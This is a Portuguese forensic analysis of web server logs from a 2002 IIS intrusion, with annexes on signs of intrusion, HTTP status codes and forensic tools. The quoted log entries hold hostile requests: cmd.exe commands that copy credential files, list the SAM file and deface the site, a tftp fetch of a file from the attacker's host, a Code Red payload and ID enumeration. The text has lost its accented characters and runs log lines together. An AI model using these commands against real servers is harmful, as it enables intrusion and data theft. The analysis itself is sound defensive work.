(depsitos, boletos e cartes de crditos).Registro da ocorrncia2002-03-27 03:34:01 200.165.19.23
GET/cmd.exe?/c+type+c:\Sites\pagamento\pagamento.asp+>+pagamento.doc 200:2002-03-27 03:34:33 200.165.19.23
GET /pagamento.doc 200 Cria tambm uma cpia do arquivo Global.asa e visualiza o arquivo. Aps conversarmos com o
desenvolvedor do site, descobrimos que no arquivo Global.asa se encontram o login e a senha de acesso ao Banco de
Dados corporativo.Global.asaUm arquivo Global.asa armazena informaes usadas de maneira global por um aplicativo
da Web e no gera contedo que exibido para o usurio. Os arquivos Global.asa contm somente o seguinte :
eventos de aplicativos, eventos de sesses, declaraes de objeto e declaraes de biblioteca de tipos. Cada site da Web
deveria usar somente um arquivo Global.asa que deve ser armazenado no ponto inicial do aplicativo da Web.Registros
da ocorrncia:2002-03-27 03:33:09 200.165.19.23 GET /cmd.exe?/c+type+global.asa+>+global.doc2002002-03-27
03:33:25 200.165.19.23 GET /global.doc 200Procura por arquivos de banco de dados.Registros da ocorrncia:2002-0327 03:35:26 200.165.19.23 GET /sites/cmd.exe?/c+dir+/S+*.mdb 2002002-03-27 03:35:56 200.165.19.23 GET
/sites/cmd.exe?/c+dir+/S+*.sql 200Respostas obtida:.
Pasta de C:\Sites\Base14/06/2001 15:12 61.440 Clientes.mdb21/05/2001 13:07 163.340 Financeiro.mdb2 arquivo(s)
224.780 bytesTotal de arquivos na lista:2 arquivo(s) 224.780 bytes0 pasta(s) 1.783.767.040 bytes disponveisPasta de
C:\Sites\Base14/06/2001 15:10 440 clientes.sql1 arquivo(s) 440 bytesTotal de arquivos na lista:1 arquivo(s) 440 bytes0
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

pasta(s) 1.783.767.040 bytes disponveisNota-se que alguns minutos depois de descobrir a existncia de informaes
importantes (bancos de dados e instrues sql), vrias outras mquinas diferentes (ips diferentes) copiam os
arquivos.Registros da ocorrncia:2002-03-27 03:38:03 200.175.12.120 GET /sites/base/clientes.sql 2002002-03-27
03:38:45 200.175.12.120 GET /sites/base/financeiro.mdb 2002002-03-27 03:39:01 68.133.2.55 GET
/sites/base/clientes.mdb 2002002-03-27 03:40:09 68.133.2.55 GET /sites/base/financeiro.mdb 2002002-03-27 03:40:55
200.192.45.7 GET /sites/base/clientes.mdb 2002002-03-27 03:40:09 200.192.45.7 GET /sites/base/financeiro.mdb
2002002-03-27 03:41:36 63.236.32.33 GET /sites/base/clientes.mdb 2002002-03-27 03:41:55 63.236.32.33 GET
/sites/base/financeiro.mdb 2002002-03-27 03:42:26 200.165.19.23 GET /sites/base/clientes.mdb 200O Hacker continua
procurando por outros tipos de documentos (doc, pdf, xls, ppt).R2002-03-27 03:39:22 200.165.19.23 GET
/sites/cmd1.exe /c+dir+/S+*.doc 2002002-03-27 03:39:52 200.165.19.23 GET /sites/cmd1.exe /c+dir+/S+*.pdf 200200203-27 03:40:02 200.165.19.23 GET /sites/cmd1.exe /c+dir+/S+*.xls 2002002-03-27 03:40:29 200.165.19.23 GET
/sites/cmd1.exe /c+dir+/S+*.ppt 200Copia para um arquivo do tipo texto a resposta da listagem e depois verifica o
resultado.Registros da ocorrncia:2002-03-27 03:41:45 200.165.19.23
GET/sites/cmd.exe/c+dir+c:\sites\*.*+>+c:\sites\dir1.txt 5022002-03-27 03:42:01 200.165.19.23 GET /sites/dir1.txt
200Dentro do diretrio repair do Windows encontram-se arquivos importantes para a recuperao do sistema em caso de
falha, um deles o sam. Atravs de um software especfico (L0pht Crack) possvel o Hacker saber as senhas dos
usurios do sistema operacional inclusive a senha do Administrador.Registro da ocorrncia:2002-03-27 03:44:45
200.165.19.23 GET /sites/cmd.exe/c+dir+c:\winnt\repair\200Resposta obtida:Pasta de c:\winnt\repair15/05/2001 16:51
<DIR> .15/05/2001 16:51 <DIR> ..23/01/2000 22:00 515 autoexec.nt25/08/2001 13:50 2.969 config.nt15/05/2001 16:35
118.784 default10/03/2002 14:55 20.480 sam15/05/2001 16:51 522.946 secsetup.inf15/05/2001 16:55 16.384
security15/05/2001 16:48 142.083 setup.log15/05/2001 16:55 5.873.664 software15/05/2001 16:55 1.077.248 system9
arquivo(s) 7.775.073 bytes2 pasta(s) 1.784.049.664 bytes disponveisLista o diretrio meus documentos procura de
informaes confidenciais.Registro da ocorrncia:2002-03-27 04:02:52 200.165.19.23
GET/cmd1.exe?/c+dir%20c:\Documents%20and%20Settings\usuario\Meus+documentos 200Cria outro arquivo texto
contendo a listagem de toda a estrutura do servidor e seus arquivos.Registro da ocorrncia:2002-03-27 04:03:39
200.165.19.23 GET /sites/cmd1.exe?/c+dir+>+teste.zen 502
(dir / S)Copia o arquivo TFTP do diretrio c:\winnt\system32 para dentro do site e tenta se comunicar com sua mquina
(provavelmente tenta copiar algum backdoor para o servidor) mas o resultado foi negativo.Registros da
ocorrncia:2002-03-27 04:05:27 200.165.19.23 GET/sites/cmd1.exe?/c+copy+c:\\winnt\system32\tftp.exe+c:\sites
5022002-03-27 04:05:55 200.165.19.23 GET /sites/tftp.exe+"-i"+200.165.19.23+GET+php.exe+c:/sites 404No registro
abaixo o invasor faz a alterao (defacement) da pgina principal do Web Site, e verifica se foi hackeada com
sucesso.Registros da ocorrncia:2002-03-27 04:07:07 200.165.19.23
GET/cmd.exe?/c+echo+Pagina+hackeada+em+27/03/2002!!!+>+c:\sites\default.htm 2002002-03-27 04:07:33
200.165.19.23 GET /sites/default.htm 200 Aps alterar a pgina principal do Web site, o Hacker procura pelos arquivos
de Log para poder exclu-los e apagar por definitivo seus rastros, felizmente os arquivos no esto em seu diretrio padro
c:\winnt\system32\LogFiles\W3SVC1Registro da ocorrncia:2002-03-27 04:09:13 200.165.19.23 GET
/sites/cmd.exe?/c+dir+/S+c:\*W3SVC* 200Resposta obtida:Pasta de c:\WINNT\ServicePackFiles\i38619/07/2001 05:34
348.944 w3svc.dll1 arquivo(s) 348.944 bytesPasta de c:\WINNT\system32\inetsrv15/03/2001 10:13 355.088 w3svc.dll1
arquivo(s) 355.088 bytesPasta de c:\WINNT\system32\LogFiles16/03/2001 18:46 <DIR> W3SVC10 arquivo(s) 0
bytesTotal de arquivos na lista:2 arquivo(s) 704.032 bytes1 pasta(s) 1.783.726.080 bytes disponveisRegistro da
ocorrncia:2002-03-27 04:09:33 200.165.19.23 GET/cmd.exe?/c+dir+/S+c:\winnt\system32\logfiles\W3SVC1
200Resposta obtida:Pasta de c:\WINNT\system32\LogFiles\W3SVC116/03/2001 20:39 <DIR> .16/03/2001 20:39 <DIR>
..0 arquivo(s) 0 bytes2 pasta(s) 1.785.491.456 bytes disponveisA ltima ocorrncia encontrada do invasor foi s
04:09:33 do dia 27/03/2002.Outros Tipos de Ocorrncias Encontradas nos Arquivos de LogQuando se analisam os
arquivos de log de um servidor Web, muitas informaes interessantes podero ser encontradas, no apenas ataques
Hackers ou Scans direcionados ao servidor, mas tambm erros de programao, tentativas de servios no autorizados,
ataques de vrus e worms, etc. Seguem algumas ocorrncias encontradas nos logs do servidor:Tentativa de ataque do
Worm Code Red.Registro da ocorrncia:2002-03-25 15:57:36 200.34.82.11
GET/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 400.Usurios tentando se
conectar a servidores de IRC (Internet Relay Chat) inexistentes.Registros da ocorrncia:2002-03-28 16:58:39
60.121.23.163 GEThttp://irc.vitimadoataque.com.br/12345.html 4042002-03-28 16:59:03 60.121.23.163 CONNECT
irc.vitimadoataque.com.br:6667 405Pgina desenvolvida em PHP no encontrada em um servidor Microsoft IIS onde
todos os sistemas so desenvolvidos em ASP.Registro da ocorrncia:2002-03-25 13:02:42 200.81.162.106 GET
/default.php 401Erros encontrados no desenvolvimento do sistema gerencial da empresa (erros na programao ASP,
XML e de acesso a banco de dados).Registros da ocorrncia:2002-03-25 12:28:24 192.168.1.140
GET/sites/projetos/print.asp?Codigo=24553&Tipo=1|-|0|404_Objeto_no_encontrado4042002-03-25 18:01:41
192.168.1.140 GET /sites/projetos/grafico.asp|1931|800a000d|Tipos_incompatveis:_'rs3' 5002002-03-26 17:03:40
192.168.1.140 GET
/sites/projetos/dominio.asp|31|800a01b6|O_objeto_no_d_suporte_para_a_propriedade_ou_mtodo:_'MachineName'
5002002-03-26 17:16:58 192.168.1.140 GET
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

/sites/siteseguro/testedominio.asp|59|800a01c2|Nmero_de_argumentos_incorreto_ou_atribuio_de_propriedade_invl
ida:_'DomainObj' 500.2002-03-27 17:07:55 192.168.1.210 GET
/sites/siteseguro/email.asp|637|800a03f9|'Then'_esperado 5002002-03-27 17:44:47 192.168.1.210 GET
/sites/pagamentos/xml.asp|10|80004005|A_folha_de_estilos_no_contm_um_elemento_de_documento._Ela_pode_est
ar_vazia_ou_no_ser_um_documento_XML_bem_formado.__ 5002002-03-27 18:41:39 192.168.1.210 GET
/sites/pagamentos/pagar.asp|19|80004005|[Microsoft][ODBC_SQL_Server_Driver][DBNETLIB]SQL_Server_does_not_ex
ist_or_access_denied. 5002002-03-28 14:07:15 192.168.1.210 GET
/sites/pagamentos/cartao.asp|127|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_column_name_'
Origem'. 5002002-03-28 17:33:02 192.168.1.210 POST
/sites/pagamentos/pagamento.asp|31|80004005|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Cannot_open_data
base_requested_in_login_'xxxxx'._Login_fails. 500Envio de informaes criptografadas ao sistema de
pagamentos.Registro da ocorrncia:2002-03-25 11:40:54 192.168.1.140 GET
/sites/pagamentos/seguro.asp?crypt=e%87z%93%BA%97%D0%B3Z%7B%8B%95%B3%B9%A6%9C%86%95%84x%8
A%8Bx%A1%A8l%BC%BD%B2 200Descobrimos na anlise, um outro tipo de ataque que estava ocorrendo no Web
Site da empresa, um ataque de difcil percepo e ocasionada por erros de desenvolvimento, denominado "ataque a nvel
de aplicativo". Abaixo apresentamos uma seqncia do funcionamento normal do sistema.Registros da
ocorrncia:2002-03-26 20:33:57 192.168.1.243 GET /Default.asp 2002002-03-26 20:34:04 192.168.1.243 GET
/principal.asp 2002002-03-26 20:34:21 192.168.1.243 POST /projetos/consulta.asp 2002002-03-26 20:34:24
192.168.1.243 GET /projetos/resposta.asp 2002002-03-26 20:35:27 192.168.1.243 GET /projetos/grafico.asp 200200203-26 20:37:22 192.168.1.243 GET /projetos/extrato.asp?Codigo=24552 200Em um funcionamento normal, para cada
consulta realizada no sistema, h uma resposta, um grfico e a possibilidade de se executar a mesma consulta no
modo extrato, porm, um usurio mal intencionado pode atravs da insero de cdigos na URL alterar o cdigo da
consulta e visualizar as respostas pertencentes a outros usurios. Mtodo pelo qual o sistema no deveria permitir.
Ataque em nvel de aplicativo sendo comprovado no arquivo de log.Registros da ocorrn2002-03-27 12:22:45
200.165.19.23 GET /Default.asp 2002002-03-27 12:22:56 200.165.19.23 GET /principal.asp 2002002-03-27 12:23:11
200.165.19.23 POST /projetos/consulta.asp 2002002-03-27 12:23:16 200.165.19.23 GET /projetos/resposta.asp
2002002-03-27 12:23:22 200.165.19.23 GET /projetos/grafico.asp 2002002-03-27 12:24:12 200.165.19.23 GET
/projetos/extrato.asp?Codigo=24552 2002002-03-27 12:24:22 200.165.19.23 GET /projetos/extrato.asp?Codigo=24553
2002002-03-27 12:25:28 200.165.19.23 GET /projetos/extrato.asp?Codigo=24554 2002002-03-27 12:25:32
200.165.19.23 GET /projetos/extrato.asp?Codigo=24555 2002002-03-27 12:25:37 200.165.19.23 GET
/projetos/extrato.asp?Codigo=24556 2002002-03-27 12:25:48 200.165.19.23 GET /projetos/extrato.asp?Codigo=24557
2002002-03-27 12:25:59 200.165.19.23 GET /projetos/extrato.asp?Codigo=24558 2002002-11-27 12:26:17
200.165.19.23 GET /projetos/extrato.asp?Codigo=24559 2002002-11-27 12:26:29 200.165.19.23 GET
/projetos/extrato.asp?Codigo=24560 200
ConclusoCom os avanos tecnolgicos nas comunicaes e a troca de informaes entre empresas e corporaes, os crimes
relacionados com informtica se espalharam. As ofensas Hi-tech tais como os Hackers, vrus, fraudes eletrnicas na
Internet e do abuso do E-mail continuaro a aumentar nos prximos anos. Muitas empresas oferecero treinamentos na
aquisio, na examinao e na utilizao apropriada da evidncia eletrnica. No poder usar a informao coletada perante o
juiz pior do que no ter uma prova.O campo da Percia Forense aplicada em Sistemas Computacionais continuar a
crescer e comearemos a ver empresas com os detetives digitais treinados na equipe de funcionrios, a combater no
somente ameaas externas e internas mas tambm a analisar e preparar procedimentos e aplicaes protetoras para a
empresa. Stephen Northcutt, Mark Cooper, Mat Fearnow, Karen Frederick : "Intrusion Signatures and Analysis", Editora
Sans Giac, New Riders, 2001, Indianpolis, Indiana, EUA. Stephen Northcutt : "Como detectar invaso em rede um
guia para analistas", Editora Cincia Moderna, 2000, Rio de Janeiro, RJ, Brasil. Joel Scambray, Stuart McLure,
George Kurtz: "Hackers Expostos Segredos e Solues para a Segurana de Redes", 2 a Edio, Editora Makron Books,
2001, So Paulo, SP, Brasil. Kevin Mandia, Chris Prosise: "Hackers resposta e contra-ataque Investigando crimes por
computador", Editora Campus, 2001, Rio de Janeiro, RJ, Brasil. Kelli Adam: "IIS 5 Administrao do Internet Information
Services", Editora Campus, 2000, Rio de Janeiro, RJ, Brasil. Microsoft Press: "Microsoft Windows NT Server 4.0
Resource Kit", Editora Makron Books, 1998, So Paulo, SP, Brasil. Sidney Galeote: "Construindo Intranet com
Windows NT 4.0" , Editora Erica, 1997, So Paulo, SP, Brasil.. Peter Davis, Barry Lewis: "Aprenda em 14 dias Windows
NT Server 4.0", Editora Campus, 1998, Rio de Janeiro, RJ, Brasil. Eduardo Bellincanta Ortiz: "Microsoft Windows 2000
Server Instalao, configurao e implementao", 2 a Edio, Editora Erica, 2001, So Paulo, SP, Brasil. Microsoft Press,
Anthony Northrup: "Introduo ao Microsoft Windows 2000 Server", Editora Campus, 1999, Rio de Janeiro, RJ, Brasil.
Microsoft Press, Jerry Honeycutt: "Introduo ao Microsoft Windows 2000 Professional", Editora Campus, 1999, Rio de
Janeiro, RJ, Brasil. Sean Deuby: "Windows 2000 Server Planejamento e Migrao", Editora Makron Books, 2000, So
Paulo, SP, Brasil. David McMahon: "Ameaa ciberntica", Editora Market Books, 2001, So Paulo, SP, Brasil. Hacking
Spyman: "Manual completo do Hacker", Editora Book Express, 2001, Rio de Janeiro, RJ, Brasil..AnexosAnexo 1Como
Saber que Houve uma InvasoQuanto mais sofisticado for o hacker, menos probabilidades ter de saber que uma
mquina est comprometida. hackers habilidosos encobriro bem suas trilhas, tornando difcil perceber se executaram
alguma alterao e podem ocultar o fato de que esto na mquina mesmo quando se estiver examinando. Ocultando os
processos, conexes abertas, acesso a arquivos e o uso de recursos do sistema, os Hackers podem tornar suas aes
quase inteiramente invisveis. H, portanto, vrias maneiras de detectar que uma invaso ocorreu.Alterao de pginas
Web : Uma diverso comum dos hackers iniciantes (ou daqueles que querem realmente enviar uma mensagem)
substituir o contedo do Web Site para anunciar sua invaso bem-sucedida. Geralmente ocorre na prpria pgina
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09

principal, onde ela a mais visvel. Se os invasores quiserem manter o acesso, raramente anunciaro sua presena
dessa ou de outras formas.Warez diminuio dramtica do espao em disco Alta utilizao da rede Contato proveniente de
outros administradores Interfaces de rede promscuas Arquivos de registro (log) excludos/truncados Arquivos utmp/wtmp
danificados (Linux) Novos usurios no sistema Execuo de processos estranhos Verifique se o processo suspeito no
simplesmente uma parte do prprio sistema.Por exemplo, slocate (Linux) freqentemente causa preocupao porque usa
uma boa quantidade de CPU e acesso ao disco, embora seja um recurso legtimo (porm opcional) do sistema.Utilizao
inexplicvel da CPU Usurios locais tiveram as contas remotas violadas O ambiente simplesmente parece estranho
Anexo 2
Definies dos Cdigos de Status do HTTP
Informativo (1xx): : Um hacker freqentemente invade partindo de uma mquina para a prxima acompanhando os
usurios quando esses acessam outros computadores. Invadindo a primeira mquina, o invasor pode observar essas
conexes para fora e comprometer a conta na nova mquina A maioria das invases que so descobertas comea quando
o administrador acha que algo est errado e inicia uma busca. s vezes, isso conduz a problemas que no esto
relacionados a invases, como uma falha no disco, memria defeituosa ou alteraes no anunciadas na rede.Utilizado
para enviar informaes para o cliente.100 : Continuar101 : Troca de protocolos (Switching Protocols)
Bem-sucedido (2xx)Indica que a solicitao (request) obteve sucesso. Por exemplo, o cdigo 200 utilizado para indicar
que a pgina solicitada foi obtida, entendida e aceita com sucesso.200 : OK201 : Criado (Created)202 : Aceito
(Accepted)203 : Informao no autorizada (Non-Authoritative Information)204 : Nenhum contedo (No Content)205 :
Contedo redefinido (Reset Content)206 : Contedo parcial (Partial Content).
Redirecionamento (3xx)Indica que aes adicionais devem ser tomadas antes da solicitao(request) ser satisfeita. Por
exemplo, o cdigo 301 indica que a pgina foimovida e o browser ser redirecionado para a nova pgina.300 :
Mltiplas opes (Multiple Choices)301 : Transferido permanentemente (Moved Permanently)302 : Transferido
temporariamente (Moved Temporarily)303 : Ver outro (See Other)304 : No modificado (Not Modified)305 : Usar proxy
(Use Proxy)307 : Redirecionamento temporrio (Temporary Redirect)
Erro de cliente (4xx)Indica que o browser fez uma solicitao (request) que no pode ser atendida. Por exemplo, "404
URL not found", indica que a pgina solicitada foi movida ou no existe.400 : Requisio errada (Bad Request)401 : No
autorizado (Unauthorized)402 : Necessrio pagamento (Payment Required)403 : Proibido (Forbidden)404 : No
encontrado (Not Found)405 : Mtodo no permitido (Method Not Allowed)406 : Inaceitvel (Not Acceptable).Andrey
Rodrigues de Freitas : andreyr@bol.com.br407 : Necessria autenticao de proxy (Proxy Authentication Required)408 :
Tempo de espera de requisio ultrapassado (Request Time-out)409 : Conflito (Conflict)410 : Foi-se (Gone)411 :
Comprimento requerido (Length Required)412 : Falha de condio prvia (Precondition Failed)413 : Entidade de requisio
muito grande (Request Entity Too Large)414 : URI de requisio muito extensa (Request-URI Too Large)415 : Tipo de
mdia no suportado (Unsupported Media Type)416 : Escala requisitada no satisfeita (Requested Range Not
Satisfiable)417 : Expectativa falhou (Expectation Failed)
Erro de servidor (5xx)Indica um erro no servidor. Por exemplo, o cdigo 503 indica que oservidor tem muita solicitaes
(requests) para processar.500 : Erro interno de servidor (Internal Server Error)501 : No implementado (Not
Implemented)502 : Gateway com erro (Bad Gateway)503 : Servio no disponvel (Service Unavailable)504 : Tempo de
espera de gateway ultrapassado (Gateway Time-out)505 : Verso do HTTP no suportada (HTTP Version Not
Supported)Norton Ghost 2000 Personal EditionSymantechttp://www.symantec.com

Anexo 3
Ferramentas Utilizadas na Percia ForenseSite : Software : SafeBack 2.0Empresa : New Technologies, Inc.Site :
Software : SnapBack DatArrest 4.12Empresa : Columbia Data Products, Inc.Site : Software : Byte BackEmpresa : Tech
Assist, Inc.Site : Software : Drive Image Pro 3.0Empresa : PowerQuest CorporationSite : Software : EnCase
2.08Guidance Software, Inc.http://www.guidancesoftware.com Empresa : Site : Software : Linux "dd" 6.1Empresa : Red
Hat Inc.Site : Software : WinHexAutor : Stefan FleschmannSite :
http://www.winhex.com http://www.redhat.com http://www.powerquest.com.http://www.toolsthatwork.com http://www.cdp.co
m http://www.forensics-intl.com ::Software : Norton Ghost 2000 Personal EditionEmpresa : SymantecSite :
http://www.symantec.com Software : SafeBack 2.0Empresa : New Technologies, Inc.Site : http://www.forensics-intl.com
Software : SnapBack DatArrest 4.12Empresa : Columbia Data Products, Inc.Site : http://www.cdp.com Software : Byte
BackEmpresa : Tech Assist, Inc.Site : http://www.toolsthatwork.com Software : Drive Image Pro 3.0Empresa :
PowerQuest CorporationSite : http://www.powerquest.com. Software : EnCase 2.08Empresa : Guidance Software,
Inc.Site : http://www.guidancesoftware.com Software : Linux "dd" 6.1Empresa : Red Hat Inc.Site : http://www.redhat.com
Software : WinHexAutor : Stefan FleschmannSite : http://www.winhex.com
http://peritocriminal.net/mambo - NOTCIAS - PERITOCRIMINAL.COM.BR

Powered by Mambo

Generated: 7 August, 2007, 17:09